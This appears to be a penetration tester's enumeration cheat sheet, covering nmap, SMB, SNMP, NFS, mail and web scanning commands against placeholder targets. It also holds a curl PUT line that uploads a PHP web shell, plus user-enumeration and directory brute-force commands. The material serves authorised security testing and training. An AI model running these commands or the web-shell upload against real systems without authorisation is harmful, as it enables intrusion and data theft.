Syn-Stealth Scan
nmap -sS $TARGETIP
Scan all ports (slow)
nmap -p- $TARGETIP
Service version, run default scripts, OS thumbprinting. Usually run on individual ports for further info.
nmap -sV -sC -O $TARGETIP -p $PORTNO
UDP port Scans (nmap slow, unicorn scan very quick)
nmap $TARGETIP -sU
Quick aggressive scan on all ports using potentially noisy/unsafe scripts nmap
$TARGETIP -p- -A -T4 -sC
Test for FTP Banner, Version and anonymous login. Also checks for basic FTP known vulns
nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $TARGETIP
Usually unexploitable. Potential exploits for very old versions. Can often be exploited for username enumeration. Also sometimes just worth connecting to for custom SSH banners. Look for version exploits. Private Key Exploits or user enumeration exploits.
Connect to mail server. Dont use dns direct connect, verbose output
nc -nvv $IP 25
HELO junk <cr><lf>
Once connected if able to. use to vrfy domain/potential users
telnet $IP 25 --> VRFY $USERNAME
nmap scan to test for basic smtp exploits and attempt to enumerate users.
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $IP
Used for tftp-server
Usefull if you have mail/user credentials. Can be used to retrieve mail. Alternativly map to server with Evolution or other mail client.
telnet $IP 110
USER user@$IP/DOMAIN
PASS $PASSWORD
or:
USER $USERNAME
PASS $PASSWORD
# List all emails
list
# Retrieve email number 5, for example
retr 5
Can sometimes disclose information regarding the machine
rpcinfo -p $IP
Check version number some versions are vulnerable
Nmap aggressive tests and vulnerability test.
nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse $IP -p 445
enum4linux checks (unauthenticataed)
enum4linux -a $IP
rpc client and following commands authentication required
rpcclient -U "$USERNAME" $IP
srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall
smbclient -L $IP
Possible SMB shares to try smbclient //$IP/tmp
smbclient \\\$IP\\ipc$ -U $USERNAME
smbclient //$IP/ipc$ -U $USERNAME
aggressive snmp nmap test scan.
nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $IP
snmp-check will carry out tests and spit info. Can customise the -c flag with any common community string or if known the used string for that domain/machine. Common ones are public, private, community.
snmp-check -t $IP -c public
Check version number some versions are vulnerable
Used by RPC to connect in a domain network
Try and grab version header or remote connect.
Show the NFS mounts
showmount -e $IP
#mount
mount $IP:/ /tmp/NFS or mount -t $IP:/ /tmp/NFS
default passwords https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm
Nmap aggressive script and vuln test
nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse $IP -p 3306
Nikto vuln scan
nikto -h http://$IP
#with proxy
nikto -h $TARGETIP -useproxy http://$LOCALIP:8080
WPS Scan
WPScan (vp = Vulnerable Plugins, vt = Vulnerable Themes, u = Users)
wpscan --url http://$IP
wpscan --url http://$IP --enumerate vp
wpscan --url http://$IP --enumerate vt
wpscan --url http://$IP --enumerate u
Joomscan
joomscan -u http://$IP
joomscan -u http://$IP --enumerate-components
Curl
# Get header
curl -i $IP
# Get all info
curl -i -L $IP
# check for title and links
curl $IP -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'
# look at page text only
curl $IP -s -L | html2text -width '99' | uniq
# Check if it is possible to upload
curl -v -X OPTIONS http://$IP/
curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://$IP/test/shell.php
Dirb
# dirb bruteforce hidden directories
dirb http://$IP
Gobuster gobuser brute for directories (good list) also returns status code's. Customise -s flag with what codes you want to see e.g 403.
gobuster -w /usr/share/wordlists/dirbuster/$DIRECTORYLIST -h http://$IP -s '200,204,301,302,307,403,500' -e
Check for heartbleed vuln
sslscan $IP:443